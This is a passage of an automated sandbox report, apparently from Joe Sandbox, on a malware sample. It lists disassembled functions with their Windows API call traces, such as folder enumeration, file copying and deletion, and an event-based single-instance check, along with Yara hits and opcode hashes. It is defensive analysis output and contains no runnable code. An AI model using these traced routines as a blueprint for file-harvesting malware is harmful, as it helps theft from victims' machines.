                                  • Instruction ID: bf295138270c4cc69baab17ac4a5d8d362901366e9326c417245979d569bef1b
                                  • Opcode Fuzzy Hash: b881c6b0ead1d296197200307cca27ecd4ed8ab0e7bcc50e28ea7705d7869b14
                                  • Instruction Fuzzy Hash: 93113CB1A45218EBEB248F94DD49FA9F7B8FB05721F1043AAF61AA32C0C77459408B51
                                  Function 022F3880 Relevance: 6.0, APIs: 4, Instructions: 45stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: strtok_s
                                  • String ID:
                                  • API String ID: 3330995566-0
                                  • Opcode ID: 88ee3256d646c21cc813880afdb35c02c7abfa0159f377c054558803c8e079b0
                                  • Instruction ID: 3903c414c8317c720e5190a219f0d88bad3482c58d54c9ec0353ddc74ca36816
                                  • Opcode Fuzzy Hash: 88ee3256d646c21cc813880afdb35c02c7abfa0159f377c054558803c8e079b0
                                  • Instruction Fuzzy Hash: 00115AB0E1020AEFCB14CFE6D848BEEB7B5FB04704F00C028E525A6254D7789500CF54
                                  Function 022F9547 Relevance: 6.0, APIs: 4, Instructions: 39fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateFileA.KERNEL32(022F3D55,80000000,00000003,00000000,00000003,00000080,00000000,?,022F3D55,?), ref: 022F9563
                                  • GetFileSizeEx.KERNEL32(000000FF,022F3D55), ref: 022F9580
                                  • CloseHandle.KERNEL32(000000FF), ref: 022F958E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$CloseCreateHandleSize
                                  • String ID:
                                  • API String ID: 1378416451-0
                                  • Opcode ID: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
                                  • Instruction ID: 75cb15518caf11755f34c3d1d7ad2f19003ac83350c760d849f3d7a93ac02722
                                  • Opcode Fuzzy Hash: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
                                  • Instruction Fuzzy Hash: A2F0AF39E50208BBDB60DFF0DC49B9EB7BAEB49310F10C264FA11A7284D63596418B40
                                  Function 022F6D5A Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                                  Download Yara Rule
                                  APIs
                                  • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,0064A540,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 022F6D31
                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 022F6D4F
                                  • CloseHandle.KERNEL32(00000000), ref: 022F6D60
                                  • Sleep.KERNEL32(00001770), ref: 022F6D6B
                                  • CloseHandle.KERNEL32(?,00000000,?,0064A540,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 022F6D81
                                  • ExitProcess.KERNEL32 ref: 022F6D89
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                  • String ID:
                                  • API String ID: 941982115-0
                                  • Opcode ID: 5d3735d569cffe7bbea000e7acfc03b16a2d4300877d619867e3aa12521868c8
                                  • Instruction ID: a436c3b8b3d6e45c776222cd66e80b7e4a486e22324e16c618ce5a4eb0828588
                                  • Opcode Fuzzy Hash: 5d3735d569cffe7bbea000e7acfc03b16a2d4300877d619867e3aa12521868c8
                                  • Instruction Fuzzy Hash: 19F05E7A9A030AAEF790ABE1DC08BBDB67AEB05741F101538F722A5194CBB04500CA56
                                  Function 00406D40 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 157COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: `o@
                                  • API String ID: 0-590292170
                                  • Opcode ID: 7ad59576bd09cc7eceacd48e5d7f84764234e902501c4ca3efc067249123903a
                                  • Instruction ID: c65cc5113f4fbf7636557f8b1f026e9f2285814709fd8c8344c4410f81c0aea8
                                  • Opcode Fuzzy Hash: 7ad59576bd09cc7eceacd48e5d7f84764234e902501c4ca3efc067249123903a
                                  • Instruction Fuzzy Hash: A66138B4900219EFCB14DF94E944BEEB7B1BB04304F1185AAE40A77380D739AEA4DF95
                                  Function 00414BB0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 118stringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                  • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00414BEA
                                  • lstrcatA.KERNEL32(?,0088B1C8), ref: 00414C08
                                    • Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
                                    • Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                    • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
                                    • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
                                    • Part of subcall function 00414910: FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
                                    • Part of subcall function 00414910: FindClose.KERNEL32(000000FF), ref: 00414B92
                                    • Part of subcall function 00414910: wsprintfA.USER32 ref: 004149B0
                                    • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,004208D2), ref: 004149C5
                                    • Part of subcall function 00414910: wsprintfA.USER32 ref: 004149E2
                                    • Part of subcall function 00414910: PathMatchSpecA.SHLWAPI(?,?), ref: 00414A1E
                                    • Part of subcall function 00414910: lstrcatA.KERNEL32(?,0088C588,?,000003E8), ref: 00414A4A
                                    • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00420FF8), ref: 00414A5C
                                    • Part of subcall function 00414910: lstrcatA.KERNEL32(?,?), ref: 00414A70
                                    • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00420FFC), ref: 00414A82
                                    • Part of subcall function 00414910: lstrcatA.KERNEL32(?,?), ref: 00414A96
                                    • Part of subcall function 00414910: CopyFileA.KERNEL32(?,?,00000001), ref: 00414AAC
                                    • Part of subcall function 00414910: DeleteFileA.KERNEL32(?), ref: 00414B31
                                    • Part of subcall function 00414910: wsprintfA.USER32 ref: 00414A07
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                  • String ID: UaA
                                  • API String ID: 2104210347-3893042857
                                  • Opcode ID: 2cac0148d2110f3df46bb078800b33f8f0db55810685f274a968c650ce667207
                                  • Instruction ID: 5a37e5a53a2562059c730f6b0b3ae842953eee94398a2728108a858f2c1bafc2
                                  • Opcode Fuzzy Hash: 2cac0148d2110f3df46bb078800b33f8f0db55810685f274a968c650ce667207
                                  • Instruction Fuzzy Hash: 9341C5BA6001047BD754FBB0EC42EEE337DA785700F40851DB54A96186EE795BC88BA6
                                  Function 00418B60 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60timeCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                  • GetSystemTime.KERNEL32(?,008855F0,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: SystemTimelstrcpy
                                  • String ID: cI@$cI@
                                  • API String ID: 62757014-1697673767
                                  • Opcode ID: 270aac1f6b61675edb1843e8a635b5515c73b826a4035c958f1de1623f3f8d38
                                  • Instruction ID: 15f3dfc6f8d56a301bf8b2a7a9260479b6db203ca669f730be279af5ebf73ee3
                                  • Opcode Fuzzy Hash: 270aac1f6b61675edb1843e8a635b5515c73b826a4035c958f1de1623f3f8d38
                                  • Instruction Fuzzy Hash: 7111E971D00008AFCB04EFA9C8919EE77B9EF58314F04C05EF01667241DF38AA86CBA6
                                  Function 00415050 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48stringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                  • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 0041508A
                                  • lstrcatA.KERNEL32(?,0088A510), ref: 004150A8
                                    • Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
                                    • Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$FileFindFirstFolderPathwsprintf
                                  • String ID: aA
                                  • API String ID: 2699682494-2567749500
                                  • Opcode ID: 7d8f81950f29c353dc6eca79efceced1e8debec432d06c8626770cf998b7186f
                                  • Instruction ID: 27646669aa04729862e240b26620d37997e147c17b59a732ce93ef494e7ce50b
                                  • Opcode Fuzzy Hash: 7d8f81950f29c353dc6eca79efceced1e8debec432d06c8626770cf998b7186f
                                  • Instruction Fuzzy Hash: B801D6BAA4020877C714FBB0DC42EEE333CAB55304F00415DB68A570D1EE789AC88BA6
                                  Function 022EBCE7 Relevance: 5.3, APIs: 4, Instructions: 284stringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 022FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022FA9EF
                                    • Part of subcall function 022FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022FAC2C
                                    • Part of subcall function 022FAC17: lstrcpy.KERNEL32(00000000), ref: 022FAC6B
                                    • Part of subcall function 022FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022FAC79
                                    • Part of subcall function 022FAB87: lstrcpy.KERNEL32(00000000,?), ref: 022FABD9
                                    • Part of subcall function 022FAB87: lstrcat.KERNEL32(00000000), ref: 022FABE9
                                    • Part of subcall function 022FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022FAB6C
                                    • Part of subcall function 022FAA07: lstrcpy.KERNEL32(?,00000000), ref: 022FAA4D
                                    • Part of subcall function 022EA077: memcmp.MSVCRT(?,00421264,00000003), ref: 022EA094
                                  • lstrlen.KERNEL32(00000000), ref: 022EBF06
                                    • Part of subcall function 022F9097: LocalAlloc.KERNEL32(00000040,-00000001), ref: 022F90B9
                                  • StrStrA.SHLWAPI(00000000,004213E0), ref: 022EBF34
                                  • lstrlen.KERNEL32(00000000), ref: 022EC00C
                                  • lstrlen.KERNEL32(00000000), ref: 022EC020
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$lstrcat$AllocLocalmemcmp
                                  • String ID:
                                  • API String ID: 1440504306-0
                                  • Opcode ID: 9e08ee45ebc43fe706c0c8ad989736c962bf943befa7584f1b5ac42d019a3d06
                                  • Instruction ID: ed0e95bb81ccccef142ad951170bc854fc1dcf4b76684e0a1d3483a209fd5269
                                  • Opcode Fuzzy Hash: 9e08ee45ebc43fe706c0c8ad989736c962bf943befa7584f1b5ac42d019a3d06
                                  • Instruction Fuzzy Hash: 2EB11F71920318ABDF58FBE4DD95EEDB33AAF64304F404169E60A62194EF346B48CF61
                                  Function 00413BDB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16filestringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcatA.KERNEL32(?,?,?,00000104,?,00000104), ref: 00413935
                                  • StrCmpCA.SHLWAPI(?,00420F70), ref: 00413947
                                  • StrCmpCA.SHLWAPI(?,00420F74), ref: 0041395D
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00413C67
                                  • FindClose.KERNEL32(000000FF), ref: 00413C7C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$CloseFileNextlstrcat
                                  • String ID: !=A
                                  • API String ID: 3840410801-2919091325
                                  • Opcode ID: 28feb7c8be81de4ab4b55bfcc7f9479259f5a9bafbd7cecf7f5c2433705f41d5
                                  • Instruction ID: 20ec2b31cb4d991c835852fde49fc2354676703d0d5a57c203257a76fc367b8d
                                  • Opcode Fuzzy Hash: 28feb7c8be81de4ab4b55bfcc7f9479259f5a9bafbd7cecf7f5c2433705f41d5
                                  • Instruction Fuzzy Hash: FCD012756401096BCB20EF90DD589EA7779DB55305F0041C9B40EA6150EB399B818B95
                                  Function 022F51A7 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 022F9047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 022F9072
                                  • lstrcat.KERNEL32(?,00000000), ref: 022F51E1
                                  • lstrcat.KERNEL32(?,00421070), ref: 022F51FE
                                  • lstrcat.KERNEL32(?,0064A5F8), ref: 022F5212
                                  • lstrcat.KERNEL32(?,00421074), ref: 022F5224
                                    • Part of subcall function 022F4B77: wsprintfA.USER32 ref: 022F4B93
                                    • Part of subcall function 022F4B77: FindFirstFileA.KERNEL32(?,?), ref: 022F4BAA
                                    • Part of subcall function 022F4B77: StrCmpCA.SHLWAPI(?,00420FDC), ref: 022F4BD8
                                    • Part of subcall function 022F4B77: StrCmpCA.SHLWAPI(?,00420FE0), ref: 022F4BEE
                                    • Part of subcall function 022F4B77: FindNextFileA.KERNEL32(000000FF,?), ref: 022F4DE4
                                    • Part of subcall function 022F4B77: FindClose.KERNEL32(000000FF), ref: 022F4DF9
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                  • String ID:
                                  • API String ID: 2667927680-0
                                  • Opcode ID: fea607eff97497eb4fd5309f6b34a87d5e7f8ff3753410a5b2e417b1bb1efa56
                                  • Instruction ID: 0bdaea05ca655ead524e857089f944e132c0aa86f526c94539ba6166496cc295
                                  • Opcode Fuzzy Hash: fea607eff97497eb4fd5309f6b34a87d5e7f8ff3753410a5b2e417b1bb1efa56
                                  • Instruction Fuzzy Hash: 8F21B67AA503087BC754FBE0DC45EE9737AAB55700F404198B64992184DE749AC9CFA2
                                  Function 022F94C7 Relevance: 5.0, APIs: 4, Instructions: 41stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpynlstrlenwsprintf
                                  • String ID:
                                  • API String ID: 1206339513-0
                                  • Opcode ID: bda2825dd20141c14e66db048f7389e73ec0fb40efc247105e9df97f2adce381
                                  • Instruction ID: cf556d70b8ffc62f258fefb865ef3c014a7be785c1c8317b948dd429a64abe9d
                                  • Opcode Fuzzy Hash: bda2825dd20141c14e66db048f7389e73ec0fb40efc247105e9df97f2adce381
                                  • Instruction Fuzzy Hash: 8401DA79540109FFCB04DFECD998EAE7BBAEF49394F108148F9099B305C635AA40DB95